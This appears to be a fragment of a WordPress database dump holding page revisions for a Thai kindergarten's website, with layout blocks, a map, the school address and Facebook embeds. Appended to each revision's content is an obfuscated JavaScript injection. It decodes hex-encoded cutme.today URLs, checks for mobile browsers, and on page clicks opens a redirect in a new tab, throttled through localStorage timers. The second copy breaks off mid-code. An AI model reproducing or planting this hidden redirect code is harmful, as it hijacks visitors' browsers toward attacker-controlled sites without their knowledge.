{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:59:10','2024-07-27 14:59:10','',19,'http://watprato.ssk.in.th/?p=86',0,'revision','',0),
(88,1,'2024-07-29 18:31:54','2024-07-29 11:31:54','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid02ZsfHLA322aMxTRXbN29d39s53bBgjKX54VohYLCoaZPX5Q4VgyLgtWiakdM5rgAul%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"616\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 